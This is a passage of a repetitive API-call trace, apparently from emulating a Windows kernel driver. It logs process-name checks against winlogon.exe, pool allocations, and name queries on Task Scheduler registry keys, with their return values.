| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0a3860, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0a3860, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2afb8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x126, ret_val_ptr_out = 0xffffe0003a785af0 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0a3860, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0a3860, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x124, ret_val_ptr_out = 0xffffe0003a774bb0 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0a3860, Length = 0x124, ObjectNameInfo_unk_out = 0xffffe0003a774bb0, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UpdateOrchestrator\Schedule Scan, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UpdateOrchestrator\Schedule Scan |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a774bb0, Tag = 0x0 |
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a785af0, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0a3860, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0a3860, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2afb8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x126, ret_val_ptr_out = 0xffffe0003a785af0 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0a3860, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0a3860, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x124, ret_val_ptr_out = 0xffffe0003a774bb0 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0a3860, Length = 0x124, ObjectNameInfo_unk_out = 0xffffe0003a774bb0, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UpdateOrchestrator\Schedule Scan, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UpdateOrchestrator\Schedule Scan |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a774bb0, Tag = 0x0 |
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a785af0, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0a3860, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0a3860, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2afb8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x126, ret_val_ptr_out = 0xffffe0003a785af0 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0a3860, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0a3860, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x124, ret_val_ptr_out = 0xffffe0003a774bb0 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0a3860, Length = 0x124, ObjectNameInfo_unk_out = 0xffffe0003a774bb0, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UpdateOrchestrator\Schedule Scan, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UpdateOrchestrator\Schedule Scan |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a774bb0, Tag = 0x0 |
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a785af0, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9f825d0, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b9f825d0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2afb8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x126, ret_val_ptr_out = 0xffffe0003a785af0 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9f825d0, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b9f825d0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x124, ret_val_ptr_out = 0xffffe0003a774bb0 |
| ObQueryNameString | Object_ptr = 0xffffc000b9f825d0, Length = 0x124, ObjectNameInfo_unk_out = 0xffffe0003a774bb0, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UpdateOrchestrator\Schedule Scan, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UpdateOrchestrator\Schedule Scan |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a774bb0, Tag = 0x0 |
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a785af0, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0a3860, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0a3860, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2afb8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x110, ret_val_ptr_out = 0xffffe0003a7664d0 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0a3860, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0a3860, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x10e, ret_val_ptr_out = 0xffffe0003a769010 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0a3860, Length = 0x10e, ObjectNameInfo_unk_out = 0xffffe0003a769010, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E5217668-D921-4907-8CE1-276EABA44515}, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E5217668-D921-4907-8CE1-276EABA44515} |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a769010, Tag = 0x0 |
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7664d0, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0a3860, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0a3860, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2afb8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x110, ret_val_ptr_out = 0xffffe0003a7664d0 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0a3860, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0a3860, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x10e, ret_val_ptr_out = 0xffffe0003a769010 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0a3860, Length = 0x10e, ObjectNameInfo_unk_out = 0xffffe0003a769010, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E5217668-D921-4907-8CE1-276EABA44515}, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E5217668-D921-4907-8CE1-276EABA44515} |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a769010, Tag = 0x0 |
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7664d0, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0a3860, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0a3860, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2afb8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x110, ret_val_ptr_out = 0xffffe0003a7664d0 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0a3860, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0a3860, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x10e, ret_val_ptr_out = 0xffffe0003a769010 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0a3860, Length = 0x10e, ObjectNameInfo_unk_out = 0xffffe0003a769010, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E5217668-D921-4907-8CE1-276EABA44515}, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E5217668-D921-4907-8CE1-276EABA44515} |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a769010, Tag = 0x0 |
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7664d0, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0a3860, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0a3860, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2afb8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x110, ret_val_ptr_out = 0xffffe0003a7664d0 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0a3860, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0a3860, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x10e, ret_val_ptr_out = 0xffffe0003a769010 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0a3860, Length = 0x10e, ObjectNameInfo_unk_out = 0xffffe0003a769010, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E5217668-D921-4907-8CE1-276EABA44515}, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E5217668-D921-4907-8CE1-276EABA44515} |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a769010, Tag = 0x0 |
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7664d0, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0a3860, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0a3860, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2afb8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x110, ret_val_ptr_out = 0xffffe0003a7664d0 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0a3860, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0a3860, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x10e, ret_val_ptr_out = 0xffffe0003a769010 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0a3860, Length = 0x10e, ObjectNameInfo_unk_out = 0xffffe0003a769010, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E5217668-D921-4907-8CE1-276EABA44515}, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E5217668-D921-4907-8CE1-276EABA44515} |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a769010, Tag = 0x0 |
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7664d0, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0a3860, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0a3860, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2afb8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x110, ret_val_ptr_out = 0xffffe0003a7664d0 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0a3860, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0a3860, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x10e, ret_val_ptr_out = 0xffffe0003a769010 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0a3860, Length = 0x10e, ObjectNameInfo_unk_out = 0xffffe0003a769010, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E5217668-D921-4907-8CE1-276EABA44515}, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E5217668-D921-4907-8CE1-276EABA44515} |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a769010, Tag = 0x0 |
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7664d0, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0a3860, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0a3860, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2afb8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x110, ret_val_ptr_out = 0xffffe0003a7664d0 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0a3860, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0a3860, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x10e, ret_val_ptr_out = 0xffffe0003a769010 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0a3860, Length = 0x10e, ObjectNameInfo_unk_out = 0xffffe0003a769010, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E5217668-D921-4907-8CE1-276EABA44515}, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E5217668-D921-4907-8CE1-276EABA44515} |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a769010, Tag = 0x0 |
